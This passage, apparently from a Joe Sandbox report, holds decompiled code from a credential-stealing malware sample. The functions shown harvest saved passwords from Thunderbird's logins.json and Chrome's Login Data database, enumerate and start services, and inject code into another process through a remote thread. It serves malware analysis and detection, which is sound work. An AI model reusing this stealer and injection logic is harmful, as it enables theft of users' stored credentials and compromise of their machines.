						E004031FD( &_v24, E004033AB( &_v60, L"Profile"));
						E004058FB(_v60);
						_v60 = _t279;
						E00403038( &_v24, _t381, __eflags, _v56 + 1);
						E004033F3( &_v12,  &_a4);
						E00403230( &_v12, _t381, __eflags,  &_v1224);
						E0040331A( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x60))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x78))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x74))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E004033F3( &_v20,  &_v12);
									E00403230( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E0040D51C( &_v16, _t382, __eflags);
									E00403230( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E004030FB( &_v16, __eflags, E0040326D( &_v64, _t381, __eflags));
									E004058FB(_v64);
									_v64 = _t279;
									E00403230( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E004031FD( &_v20,  &_v16);
										_t386 = _v20;
									}
									E0040D9F6( &_v184, __eflags);
									_t321 =  &_v180;
									E004031FD(_t321,  &_v20);
									_push(_t321);
									_t200 = E0040DCBA( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0040D965( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E00403185( &_v104, "encryptedUsername");
										_t210 = E00402CF2( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E004089D8(_t210, _t208, __eflags);
										_v108 = _t281;
										E004058FB(_v160);
										_t332 = _v104;
										E004058FB(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E00403185( &_v116, "hostname");
												E00408A11( &_v40, E00402CF2( &_v52,  &_v112), __eflags, _t223, _t393);
												E004058FB(_v112);
												E004058FB(_v116);
												_t229 = E00403185( &_v124, "encryptedUsername");
												E00408A11( &_v84, E00402CF2( &_v52,  &_v120), __eflags, _t229, _t393);
												E004058FB(_v120);
												E004058FB(_v124);
												_t235 = E00403185( &_v132, "encryptedPassword");
												_t381 = E00402CF2( &_v52,  &_v128);
												E00408A11( &_v80, _t237, __eflags, _t235, _t393);
												E004058FB(_v128);
												E004058FB(_v132);
												E00409C70(_t387, __eflags, _v84,  &_v136);
												E00409C70(_t387, __eflags, _v80,  &_v144);
												E004031FD( &_v100, E00402E63( &_v40, __eflags,  &_v68));
												E004058FB(_v68);
												_v68 = 0;
												E004031FD( &_v96, E00402E63(E00403185( &_v140, _v136), __eflags,  &_v72));
												E004058FB(_v72);
												_v72 = 0;
												E004058FB(_v140);
												E004031FD( &_v92, E00402E63(E00403185( &_v148, _v144), __eflags,  &_v76));
												E004058FB(_v76);
												_v76 = 0;
												E004058FB(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E00401ED8(_t395,  &_v100);
												E00401F0E(_t387);
												E004058FB(_v80);
												E004058FB(_v84);
												E004058FB(_v40);
												_t332 =  &_v100;
												E0040138F( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E004033F3(_t395,  &_v16);
											E0040DA33(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x7c))(_v152);
										 *((intOrPtr*)(_v32 + 0x64))();
										E00402DFF( &_v52);
										_t323 =  &_v184;
									}
									E0040DA15(_t323, __eflags);
									E004058FB(_t392);
									_v16 = _t279;
									E004058FB(_t386);
									_v20 = _t279;
									E004058FB(_v28);
									E004058FB(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E004058FB(_v28);
							E004058FB(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0040A139(_t385);
					_t279 = 1;
					__eflags = 1;
					E004058FB(_v36);
				} else {
					E004033F3(_t395,  &_v44);
					if(E0040A190(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E004058FB(_v44);
				E004058FB(_t389);
				E004058FB(_a4);
				return _t279;
			}

0x004091e6
0x004091f2
0x004091fc
0x004091ff
0x00409209
0x00409213
0x0040921d
0x00409227
0x0040922f
0x00409234
0x00409237
0x00409242
0x00409252
0x00409265
0x00409272
0x00409277
0x00409280
0x004092a1
0x004092a9
0x004092b5
0x004092c2
0x004092d8
0x004092e0
0x004092e9
0x004092ee
0x004092f1
0x004096d1
0x004096d1
0x004096e2
0x004096e8
0x004096ea
0x00000000
0x00000000
0x00409303
0x0040930f
0x00409317
0x00409320
0x00409323
0x0040932f
0x0040933e
0x0040934a
0x00409352
0x00409356
0x00409358
0x0040936f
0x00409372
0x00409378
0x0040937a
0x00000000
0x0040937c
0x00409380
0x00409383
0x00409386
0x00409388
0x00000000
0x0040938a
0x00409391
0x0040939e
0x004093a5
0x004093a9
0x004093b6
0x004093bd
0x004093ca
0x004093d2
0x004093df
0x004093e2
0x004093e7
0x004093ea
0x004093f6
0x004093f8
0x00409401
0x00409406
0x00409406
0x0040940f
0x00409418
0x0040941e
0x00409423
0x0040942f
0x00409434
0x0040943a
0x0040943c
0x0040944c
0x00409450
0x00409453
0x00409460
0x00409471
0x00409476
0x00409485
0x00409487
0x0040948a
0x0040948f
0x00409492
0x00409497
0x00409499
0x0040965a
0x0040965a
0x0040949f
0x0040949f
0x004094a2
0x004094a2
0x004094a4
0x004094a7
0x004094b0
0x004094b3
0x004094b6
0x004094b9
0x004094d0
0x004094da
0x004094e2
0x004094f0
0x00409507
0x00409511
0x00409519
0x00409527
0x00409539
0x0040953e
0x00409548
0x00409550
0x00409561
0x00409572
0x00409587
0x0040958f
0x00409597
0x004095b7
0x004095bf
0x004095ca
0x004095cd
0x004095f2
0x004095fa
0x00409605
0x00409608
0x0040960d
0x00409610
0x0040961d
0x00409624
0x0040962c
0x00409634
0x0040963c
0x00409641
0x00409644
0x00409649
0x00409649
0x00409649
0x00409652
0x00409655
0x00409655
0x0040965d
0x00409663
0x00409665
0x0040966e
0x00409673
0x00409678
0x00409682
0x00409689
0x0040968f
0x00409694
0x00409694
0x0040969a
0x004096a1
0x004096a8
0x004096ab
0x004096b3
0x004096b6
0x004096be
0x004096c3
0x004096c3
0x00409388
0x0040935a
0x0040935a
0x0040935d
0x00409365
0x00409365
0x004096c6
0x004096c9
0x004096cc
0x004096cc
0x004096f2
0x004096fc
0x004096fc
0x004096fd
0x00409282
0x00409289
0x00409297
0x00000000
0x00409299
0x00409299
0x00409299
0x00409297
0x00409705
0x0040970c
0x00409714
0x0040971f

APIs

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

Part of subcall function 0040ABE2: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040AC1E
Part of subcall function 0040ABE2: lstrcatW.KERNEL32 ref: 0040AC2C
Part of subcall function 0040ABE2: RegOpenKeyExW.ADVAPI32 ref: 0040AC45
Part of subcall function 0040ABE2: RegQueryValueExW.ADVAPI32(00409247,Path,00000000,?,?,?), ref: 0040AC62
Part of subcall function 0040ABE2: RegCloseKey.ADVAPI32(00409247), ref: 0040AC6B

GetBinaryTypeW.KERNEL32 ref: 00409265

Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D

Part of subcall function 0040A190: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040A1BE
Part of subcall function 0040A190: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A1C7
Part of subcall function 0040A190: PathFileExistsW.SHLWAPI(0040927E), ref: 0040A2B5

GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 004096E2

Part of subcall function 0040A190: PathFileExistsW.SHLWAPI(0040927E), ref: 0040A311
Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,0040927E,?,00000104,00000000), ref: 0040A350
Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A35B
Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A366
Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A371
Part of subcall function 0040A190: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040A37C
Part of subcall function 0040A190: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040A463

Strings

encryptedPassword, xrefs: 0040951F
Profile, xrefs: 004091F7, 004092C7, 004092FE
Path, xrefs: 004096DC
.tmp, xrefs: 004093D7
\logins.json, xrefs: 00409396
\Thunderbird\, xrefs: 004092A1
encryptedUsername, xrefs: 00409458, 004094E8
hostname, xrefs: 004094A8
thunderbird.exe, xrefs: 0040923D
profiles.ini, xrefs: 004092BA

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
API String ID: 1065485167-1863067114
Opcode ID: a6fea101c96028ee8d4eab0a8f768a8748663c25d0c6bd72b57e65a7c7cc4f06
Instruction ID: 76608c0a9dd13001c5c1291ab4823583e2da0a2b14709576b3baf5b643cc29c3
Opcode Fuzzy Hash: a6fea101c96028ee8d4eab0a8f768a8748663c25d0c6bd72b57e65a7c7cc4f06
Instruction Fuzzy Hash: E0E1E872A00218ABCB04EBA1DD929EEB779AF48305F10407EE406B71D2DE785E45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B64D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B64D(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}

0x0040b659
0x0040b65c
0x0040b662
0x0040b666
0x0040b677
0x0040b67b
0x0040b693
0x0040b6ba
0x0040b6bc
0x0040b6bd
0x0040b6c4
0x0040b6c7
0x0040b6c9
0x0040b6cb
0x00000000
0x0040b6cb
0x0040b6a0
0x00000000
0x00000000
0x0040b6a7
0x0040b6b8
0x00000000
0x00000000
0x00000000
0x0040b6b8
0x0040b67e
0x0040b684
0x00000000
0x0040b684
0x0040b6cf

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040B65C
OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040B671
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B67E
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040B68B
GetLastError.KERNEL32 ref: 0040B695
Sleep.KERNEL32(000007D0), ref: 0040B6A7
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040B6B0
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B6C4
CloseServiceHandle.ADVAPI32(00000000), ref: 0040B6C7

Strings

ServicesActive, xrefs: 0040B654

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
String ID: ServicesActive
API String ID: 104619213-3071072050
Opcode ID: 7a2d813b2d2b31e7b12a59e783d5f538d9bd657ebd592841658045f2d1f7d19a
Instruction ID: ec19a78f52c12aad1481474b245b1fd78cd64b3684018ca5afe7afaa95a58ef4
Opcode Fuzzy Hash: 7a2d813b2d2b31e7b12a59e783d5f538d9bd657ebd592841658045f2d1f7d19a
Instruction Fuzzy Hash: 53017171200215B7D2215B769D4DE9B3E6CEBC9751B008936FA01E6290CBB5C811C7BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BBA0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167
servicestringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040BBA0(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				char _v16;
				char _v20;
				short* _v24;
				signed int _v28;
				short** _v32;
				short* _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr* _t66;
				char* _t69;
				void* _t90;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t105;
				intOrPtr* _t112;
				intOrPtr _t113;
				char _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				void* _t119;

				_t113 = __ecx;
				_v44 = __ecx;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v36 = 0;
				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
				if(_t90 == 0) {
					L9:
					_v40 = _v40 & 0x00000000;
					L10:
					E004058FB(_v24);
					return _v40;
				}
				_v40 = 1;
				_v32 = _t113 + 0x28;
				while(1) {
					L2:
					_v16 = 0;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
					_t114 = _v20;
					_t66 = E00405955(_t114);
					_t112 = _t66;
					_t69 =  &_v20;
					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E004033AB( &_v12,  *_t91);
						if(E0040300E( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E004031FD( &_v24, E004033AB( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E004058FB(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E004058FB(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E004033AB( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E004033AB(_t119,  *_t112);
										E00402100(_t92 + 0x40,  &_v12);
									}
									E004058FB(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0040B5E1(_v32, 2);
							E0040B64D(_v32);
							_v36 = 1;
							E004010C1(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E004058FB(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}

0x0040bbab
0x0040bbb5
0x0040bbb8
0x0040bbbb
0x0040bbbe
0x0040bbc1
0x0040bbc4
0x0040bbcd
0x0040bbd1
0x0040bc81
0x0040bc81
0x0040bc85
0x0040bc88
0x0040bc94
0x0040bc94
0x0040bbda
0x0040bbe1
0x0040bbe4
0x0040bbe4
0x0040bbee
0x0040bbfe
0x0040bc04
0x0040bc09
0x0040bc10
0x0040bc1a
0x0040bc27
0x0040bc2f
0x00000000
0x00000000
0x0040bc3f
0x0040bc45
0x0040bc4a
0x00000000
0x00000000
0x0040bc4c
0x0040bc4e
0x0040bc58
0x0040bc6a
0x0040bc95
0x0040bca7
0x0040bcaf
0x0040bcb4
0x0040bcbe
0x0040bcc2
0x0040bcc5
0x0040bcca
0x0040bcd2
0x0040bd15
0x0040bd18
0x0040bd1c
0x00000000
0x00000000
0x0040bd22
0x0040bd31
0x0040bd6e
0x0040bd6e
0x0040bd6f
0x0040bd74
0x00000000
0x00000000
0x00000000
0x0040bd76
0x0040bd38
0x0040bd4b
0x0040bd52
0x0040bd5a
0x0040bd5a
0x0040bd62
0x0040bd67
0x0040bd6b
0x00000000
0x0040bd6b
0x00000000
0x0040bd22
0x0040bcda
0x00000000
0x00000000
0x0040bce2
0x0040bce8
0x0040bcee
0x0040bcf1
0x0040bd06
0x0040bd0a
0x00000000
0x00000000
0x00000000
0x0040bd10
0x0040bc6f
0x0040bc74
0x0040bc78
0x0040bc7b
0x0040bc7f
0x00000000
0x00000000
0x00000000
0x0040bc7f
0x00000000
0x0040bc4e
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0040BBC7
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0040BBFE

Part of subcall function 00405955: GetProcessHeap.KERNEL32(00000000,?,00402D70,?,?,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000), ref: 00405958
Part of subcall function 00405955: RtlAllocateHeap.NTDLL(00000000,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000,?,?,00000000), ref: 0040595F

EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0040BC27
GetLastError.KERNEL32 ref: 0040BC31
CloseServiceHandle.ADVAPI32(00000000), ref: 0040BC3F
OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0040BD00
lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0040BD43

Strings

ServicesActive, xrefs: 0040BBAF, 0040BCF9

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
String ID: ServicesActive
API String ID: 899334174-3071072050
Opcode ID: 6688011a7adf512e3efe4e48f9b707c9ee93e8548dfea5412579028a87b209c2
Instruction ID: 091077a69be1e387389f1815173640768f280a35bf81accc927e6a5b28d28e0a
Opcode Fuzzy Hash: 6688011a7adf512e3efe4e48f9b707c9ee93e8548dfea5412579028a87b209c2
Instruction Fuzzy Hash: 0D514D71D00209ABEB15DFA1CD95BEFBBB8EF18305F10417AE901B62D1DB785A41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00408917 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408917(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x4166b0, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x4166b0,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E00408606(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}

0x00408936
0x00408938
0x00408957
0x0040896d
0x00408972
0x00408974
0x00408980
0x0040899e
0x004089ad
0x004089b8
0x004089b8
0x004089cb
0x00408974
0x004089d5

APIs

GetFullPathNameA.KERNEL32(004166B0,00000104,?,00000000), ref: 00408938
PathCombineA.SHLWAPI(?,?,00413500), ref: 00408957
FindFirstFileA.KERNEL32(?,?), ref: 00408967
PathCombineA.SHLWAPI(?,004166B0,0000002E), ref: 0040899E
PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 004089AD

Part of subcall function 00408606: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00408623
Part of subcall function 00408606: GetLastError.KERNEL32 ref: 00408630
Part of subcall function 00408606: CloseHandle.KERNEL32(00000000), ref: 00408637

FindNextFileA.KERNEL32(00000000,?), ref: 004089C5

Strings

., xrefs: 00408982
Accounts\Account.rec0, xrefs: 004089A0

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
String ID: .$Accounts\Account.rec0
API String ID: 3873318193-2526347284
Opcode ID: 28746f312aa6f1d593443a8bafe48a18979b16af2a8a209f12eaa21e16227ba0
Instruction ID: af4d2d7fb62061b5245a62fce9e84327f4f52bd8b75fa1df41cb451cf8fc475c
Opcode Fuzzy Hash: 28746f312aa6f1d593443a8bafe48a18979b16af2a8a209f12eaa21e16227ba0
Instruction Fuzzy Hash: D81133B190021C6BDB20DBA4DD89FEB7B6CEB44714F1045A7E645E3180D6789A84CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6ED Relevance: 13.6, APIs: 9, Instructions: 81
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F6ED(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E004010AD(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E00401114( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27,  &E00416178, 0x800, 0);
				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x4167b4 = _t25;
				return _t25;
			}

0x0040f707
0x0040f709
0x0040f717
0x0040f725
0x0040f72a
0x0040f738
0x0040f762
0x0040f76c
0x0040f77d
0x0040f798
0x0040f7aa
0x0040f7ae
0x0040f7bd
0x0040f7c5
0x0040f7cc

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,00000000), ref: 0040F701
GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0040F70C

Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA

GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF,?,?,00000000), ref: 0040F72A
VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040,?,?,00000000), ref: 0040F754
WriteProcessMemory.KERNEL32(00000000,00000000,00416178,00000800,00000000,?,?,00000000), ref: 0040F76C
VirtualProtectEx.KERNEL32(00000000,00000000,00000800,00000040,?,?,?,00000000), ref: 0040F77D
VirtualAllocEx.KERNEL32(00000000,00000000,00000103,00003000,00000004,?,?,00000000), ref: 0040F794
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000103,00000000,?,?,00000000), ref: 0040F7AA
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0040F7BD

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
String ID:
API String ID: 900395357-0
Opcode ID: 6f35c02e06d2280d8f7d5cd7375ef5cec8c89269c6f5a9685c312ea851288564
Instruction ID: 07a090dde3f9dd14525a07a3359b94bce5f9695ad8c3566792f372a643309deb
Opcode Fuzzy Hash: 6f35c02e06d2280d8f7d5cd7375ef5cec8c89269c6f5a9685c312ea851288564
Instruction Fuzzy Hash: 27218171640218BEFB209B51DD4BFEB7F6CEB45B50F204176B704AA0D0D6F06E408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADBB Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 290
fileencryptionCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040ADBB(void* __ecx, void* __eflags) {
				char _v8;
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t127;
				void* _t128;
				signed int _t131;
				void* _t135;
				char _t136;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				char _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t191;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				signed int _t264;
				void* _t267;
				void* _t268;
				void* _t269;

				_t269 = __eflags;
				_t263 = __ecx;
				E00403185( &_v44, "SELECT * FROM logins");
				_t260 = 0x1a;
				E0040D51C( &_v12, _t260, _t269);
				E00403230( &_v12, _t260, _t269, "\\");
				_t261 = 8;
				E004030FB( &_v12, _t269, E0040326D( &_v36, _t261, _t269));
				E004058FB(_v36);
				E00403230( &_v12, _t261, _t269, L".tmp");
				_t262 = 0x1c;
				E0040D51C( &_v20, _t262, _t269);
				E00403230( &_v20, _t262, _t269, L"\\Google\\Chrome\\User Data\\Default\\Login Data");
				if(PathFileExistsW(_v20) == 0 || CopyFileW(_v20, _v12, 0) == 0) {
					L4:
					_t264 = 0;
					goto L5;
				} else {
					E004031FD( &_v20,  &_v12);
					_t127 = E0040331A( &_v20,  &_v36);
					_t128 =  *((intOrPtr*)(_t263 + 0x24))( *_t127,  &_v40, 2, 0);
					_t208 = _v36;
					_t268 = _t267 + 0x10;
					E004058FB(_v36);
					if(_t128 == 0) {
						_t131 =  *((intOrPtr*)(_t263 + 0x30))(_v40, _v44, 0xffffffff,  &_v8, 0);
						_t268 = _t268 + 0x14;
						__eflags = _t131;
						if(_t131 != 0) {
							goto L3;
						}
						_t135 =  *((intOrPtr*)(_t263 + 0x3c))(_v8);
						_t264 = 1;
						while(1) {
							__eflags = _t135 - 0x64;
							if(_t135 != 0x64) {
								break;
							}
							_v68 = _v68 & 0x00000000;
							_t191 = 0;
							_v64 = 0;
							_t136 = E00405878(_t264);
							_v16 = _t136;
							E00403185( &_v24,  *((intOrPtr*)(_t263 + 0x38))(_v8, 0));
							E00403185( &_v60,  *((intOrPtr*)(_t263 + 0x38))(_v8, _t264));
							_t141 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 3);
							__eflags = _t141;
							if(_t141 > 0) {
								E00402EEB( &_v16, E00403185( &_v48,  *((intOrPtr*)(_t263 + 0x38))(_v8, 3)));
								E004058FB(_v48);
							}
							_t142 =  *((intOrPtr*)(_t263 + 0x54))(_v8, 3);
							__eflags = _t142;
							if(_t142 > 0) {
								E00402EEB( &_v16, E00403185( &_v52,  *((intOrPtr*)(_t263 + 0x38))(_v8, 3)));
